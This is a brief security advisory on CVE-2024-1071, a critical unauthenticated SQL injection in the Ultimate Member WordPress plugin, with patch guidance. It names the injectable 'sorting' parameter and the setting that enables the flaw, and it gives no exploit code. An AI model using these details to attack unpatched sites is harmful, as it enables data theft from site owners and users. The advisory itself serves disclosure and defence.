Critical SQL injection vulnerability in 'Ultimate Member' WordPress Plugin
Take action: If you are using Ultimate Member for Wordpress, patch to the latest version as soon as you can. At minimum, make sure that the option "Enable custom table for usermeta" in the plugin is deactivated.
Learn More
A critical SQL injection vulnerability is reported in Ultimate Member plugin for WordPress.
The vulnerability is tracked as CVE-2024-1071 (CVSS score 9.8) is impacting over 200,000 installations and could allow unauthenticated attackers to inject SQL queries into the database through an insecure implementation in the plugin's user query functionality, particularly via the 'sorting' parameter. The vulnerability arises due to inadequate sanitization of user-supplied parameters and insufficient query preparation, potentially enabling attackers to extract sensitive information from the database.
The exploit requires the "Enable custom table for usermeta" option within the plugin to be active for the vulnerability to be exploitable. Despite this limitation, users of the plugin are strongly advised to update to the latest version, 2.8.3, which contains the necessary patch to address this security issue. The patch was released on February 19th, 2024, following the report of the vulnerability on January 30th, 2024.
